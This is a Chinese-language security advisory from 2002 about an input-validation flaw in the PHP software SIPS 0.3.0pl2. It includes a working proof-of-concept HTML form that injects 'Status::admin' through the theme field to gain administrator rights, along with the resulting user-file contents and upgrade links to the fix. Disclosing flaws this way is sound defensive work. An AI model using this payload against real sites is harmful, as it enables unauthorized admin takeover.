SIPS Themes 表单可操作漏洞发布时间:2002-02-18 更新时间:2002-02-18 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4097 受影响系统 SIPS SIPS 0.3.0pl2详细描述 SIPS 是一款PHP编写的可以用来连接索引等功能的软件。 SIPS没有在用户参考域中过滤表单内容,用户参考表单中包含用户可选择主题段, 当用户选择某一主题,这个信息就会写到用户数据库,而在新行中的额外数据内容 由于没有正确检查也会写入到用户数据库。 这样就存在可能导致恶意用户如写"Status::admin" 信息到数据库而造成管理员访问。 测试代码 <form action="http://www.site.com/sips/htdocs/preferences.php" method="post"> <input type="hidden" name="op" value="theme"> <input type="hidden" name="action" value="settheme"> <select name="themename"> <option value="default Status::admin ">Exploited</option> </select> <input type="submit" value="Set Theme"></form> 这样的表单可以写信息到用户文件中: bash-2.03$ cat user Password::660120d6fbc1sn241be39290636b2942 Email::b0iler@hotmail.com Timezone::Greenwich Mean Theme::default Status::admin 而Status::admin此项可以导致访问: http://www.site.com/sips/htdocs/admin/index.php 而控制软件。 解决方案 下载如下升级程序: SIPS SIPS 0.3.0pl2: SIPS Upgrade sips-0.3.1.tar.gz http://prdownloads.sourceforge.net/sips/sips-0.3.1.tar.gz SIPS SIPS 0.3.0pl1: SIPS Upgrade sips-0.3.1.tar.gz http://prdownloads.sourceforge.net/sips/sips-0.3.1.tar.gz SIPS SIPS 0.3.0: SIPS Upgrade sips-0.3.1.tar.gz http://prdownloads.sourceforge.net/sips/sips-0.3.1.tar.gz SIPS SIPS 0.2.4: SIPS Upgrade sips-0.3.1.tar.gz http://prdownloads.sourceforge.net/sips/sips-0.3.1.tar.gz 相关信息 参考:http://www.securityfocus.com/archive/1/255977 相关主页:http://sourceforge.net/projects/sips/ |
